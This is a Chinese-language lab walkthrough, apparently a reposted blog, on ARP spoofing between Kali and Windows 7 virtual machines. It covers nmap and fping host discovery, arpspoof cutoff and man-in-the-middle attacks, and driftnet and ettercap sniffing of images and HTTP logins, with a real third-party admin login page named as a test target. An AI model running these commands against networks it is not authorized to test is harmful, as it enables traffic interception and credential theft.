arp欺骗实践

声明:本文中所有的命令开头均为小写,大写是文本粘贴时自动转换的

arp欺骗简介:主机和外部通信时需要获取网关的mac地址,通过在局域网广播arp请求包(含有网关ip)获得arp响应包(网关mac地址)的形式更新本地arp路由表,由于主机不会对arp响应包进行身份验证所以攻击主机可以通过向目标主机发送arp响应包(包含本机的mac地址)并且向网关进行arp请求轰炸的形式让目标主机得不到网关的arp响应,错误的把攻击主机当成网关,导致目标主机的所有流量都会经过攻击主机,这时攻击主机就可以监听目标主机的所有通信信息,从而实行断网或数据截取操作

环境配置

kali虚拟机

ip地址:192.168.232.129

Win7虚拟机

IP地址:192.168.232.128

网关

ip地址:192.168.232.2

确保两个虚拟机之间能够ping通

1.开启目标主机和攻击主机并获取网络信息

        查看目标主机的网络信息

Ipconfig /all

Arp -a

查看本地路由表

arp欺骗实践_第1张图片

arp欺骗实践_第2张图片

查看kali主机的网络信息

arp欺骗实践_第3张图片

测试攻击主机和目标主机是否可以正常通信(同一网段)

Ping 192.168.232.129

目标主机中输入

Arp -a

发现两主机之间可以ping通,目标主机中也出现了攻击主机的信息

arp欺骗实践_第4张图片

2.扫描网络内的活跃主机信息

方法1

Fping -a -g 192.168.232.0/24 >result

将扫描结果写进result文件中

-a:扫描存活主机信息

-g:扫描整个网段

Cat /home/kali/result

查看result文件

arp欺骗实践_第5张图片

方法2

Nmap -sP 192.168.232.0/24

ping的方式检测活跃主机信息

Nmap -sS 192.168.232.0/24

发送syn请求的方式检测活跃主机信息,更不容易发现,扫描更彻底

arp欺骗实践_第6张图片

arp欺骗实践_第7张图片

3.开始进行arp欺骗

首先让目标主机进行外部通信

Ping baidu.com -t

持续访问百度,能上网

arp欺骗实践_第8张图片

查看kali主机的ip_forward值

Cat /proc/sys/net/ipv4/ip_forward

查看是否开启流量转发

arp欺骗实践_第9张图片

开始断网攻击

Arpspoof -i eth0 -t 192.168.232.128 192.168.232.2

-i:指定网卡

-t:目标ip 网关ip

arp欺骗实践_第10张图片

arp欺骗实践_第11张图片

arp欺骗实践_第12张图片

现在开启arp流量转发,监听信息

方法1:

Echo 1 > /proc/sys/net/ipv4/ip_forward

临时开启流量转发(重新开机会重置为0)

Cat /proc/sys/net/ipv4/ip_forward

方法2:

Vim /etc/sysctl.conf

永久修改ip_foward值

Net.ipv4.ip_foward=1

将这句语句前面的#去掉就行

Sysctl -p

使改变生效,这里不进行演示

arp欺骗实践_第13张图片

此时再进行arp欺骗

kali主机

Arpspoof -i eth0 -t 192.168.232.128 192.168.232.2

arp欺骗实践_第14张图片

目标主机

Arp -a 

路由表已经改变,arp欺骗成功

Ping baidu.com

能ping通百度说明此时还能正常上网

arp欺骗实践_第15张图片

截取目标主机访问的图片信息

http图片测试网站

登录实验吧icon-default.png?t=N7T8https://passport.shiyanbar.com/

Driftnet -i eth0

只能抓取http网站的图片

arp欺骗实践_第16张图片

截取http网站输入的账号密码数据

测试的网址

后台登录icon-default.png?t=N7T8http://a.aixjt.com/AdminPublic.html

Ettercap -Tq -i eth0

arp欺骗实践_第17张图片

arp欺骗实践_第18张图片

arp欺骗实践_第19张图片

你可能感兴趣的:(网络)